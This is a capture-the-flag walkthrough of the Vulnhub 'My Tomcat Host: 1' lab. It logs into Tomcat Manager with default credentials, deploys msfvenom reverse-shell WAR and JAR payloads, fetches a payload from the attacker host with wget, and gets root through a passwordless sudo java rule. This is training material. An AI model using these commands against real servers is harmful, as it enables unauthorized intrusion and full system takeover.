medium.com

My Tomcat Host: 1 | Walkthrough |Vulnhub

Anshika
5–7 minutes

Anshika

Difficulty: Easy/Beginner
Objective: Gain root access and retrieve the flag.

This Vulnhub box, “My Tomcat Host: 1,” is a beginner-friendly challenge that provides an excellent learning opportunity for those interested in web application security and privilege escalation techniques. In this walkthrough, we’ll detail the steps taken to discover, enumerate, exploit, and escalate privileges on the target system.

Methodologies and Tools Used:

  1. Host Discovery:
    Tool: netdiscover
    Purpose: Identify the target IP address.
  2. Port Scanning and Service Enumeration:
    Tool: nmap
    Purpose: Discover open ports and services.
  3. Web Application Vulnerability Scanning:
    Tool: Nikto
    Purpose: Identify vulnerabilities and default credentials in the web application.
  4. Exploitation:
    Tool: msfvenom, netcat
    Purpose: Generate a reverse shell payload and establish a connection.
  5. Privilege Escalation:
    Tool: msfvenom, wget, sudo
    Purpose: Escalate privileges using a Java-based reverse shell.
  6. Flag Capture:
    Command Line
    Purpose: Confirm root access and retrieve the flag.

Step 1: Host Discovery

The first step is to identify the IP address of the target machine on the network. We use netdiscover for this purpose.

netdiscover

Press enter or click to view image in full size

Target IP: 192.168.1.8

Step 2: Enumeration

With the target IP identified, we move on to port scanning using nmap to discover open ports and gather detailed information about the services running on the target.

nmap -p- -A 192.168.1.8

Press enter or click to view image in full size

Results:

  • Port 22: Open (SSH)
  • Port 8080: Open (HTTP — Apache Tomcat)

Given these results, we focus on further enumeration of these specific ports, especially the HTTP service running on port 8080.

Press enter or click to view image in full size

Step 3: Web Application Enumeration

Navigating to http://192.168.1.8:8080 in a web browser, we see the default Apache Tomcat installation page. This is a promising vector for further exploration.

To deepen our analysis, we use Nikto, a web server scanner, to check for vulnerabilities or misconfigurations.

Press enter or click to view image in full size

  • The most critical piece of information obtained is the default credentials for the Tomcat Manager Application:
    Username: tomcat
    Password: tomcat
  • Access is available at the /manager/html directory.

Press enter or click to view image in full size

Step 4: Exploitation

The Tomcat Manager allows for the deployment of .war (Web Application Archive) files. We can leverage this functionality to upload a malicious .war file that will grant us a reverse shell.

Creating the Reverse Shell Payload:

We use msfvenom to generate a .war payload that, when executed, will initiate a reverse shell connection back to our attacking machine.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f war > shell.war

Press enter or click to view image in full size

Where:

  • LHOST is our IP address.
  • LPORT is the port we will listen on.

Uploading the Payload:

  1. Access the Tomcat Manager at http://192.168.1.8:8080/manager/html.
  2. Log in using the credentials obtained earlier.
  3. Upload the shell.war file.

Launching the Attack:

  1. Start a listener on your attacking machine to catch the reverse shell.

Press enter or click to view image in full size

Trigger the payload by navigating to the uploaded .war file on the target machine.

Press enter or click to view image in full size

Outcome:
A reverse shell is established, granting us unprivileged access to the target machine.

Step 5: Privilege Escalation

Now that we have a foothold on the system, the next step is to escalate our privileges to root.

Get Anshika’s stories in your inbox

Join Medium for free to get updates from this writer.

Interactive Shell:

First, we convert our current shell into an interactive one to facilitate easier command execution.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Press enter or click to view image in full size

Sudo Permissions Check:

By inspecting the sudo permissions, we discover that the java command can be executed as root without a password:

Press enter or click to view image in full size

Privilege Escalation Using Java:

To escalate privileges, we can execute a Java-based reverse shell as root.

Creating the Payload:

We generate a .jar payload using msfvenom:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.3 LPORT=5555 -f jar >rootme.jar

Press enter or click to view image in full size

Hosting the Payload:

Start a simple HTTP server on your attacking machine to serve the .jar file to the target.

python3 -m http.server 1234

Press enter or click to view image in full size

Download the Payload on the Target:

On the target machine, download the .jar file using wget:

wget http://192.168.1.3:1234/rootme.jar

Press enter or click to view image in full size

Set Execution Permissions:

Grant execution permissions to the .jar file:

chmod +x rootme.jar

Execute the Payload as Root:

Start a listener on your attacking machine:

nc -lvp 5555

Then, execute the .jar file as root:

sudo java -jar rootme.jar

Outcome:
You now have a root shell on the target machine.

Step 6: Capture the Flag

With root access, navigate to the root directory and retrieve the flag:

id

ls

cd /root

cat proof.txt

Press enter or click to view image in full size

Flag Captured!

This box provided a straightforward yet valuable experience in exploiting web-based services, managing reverse shells, and privilege escalation using misconfigured sudo permissions.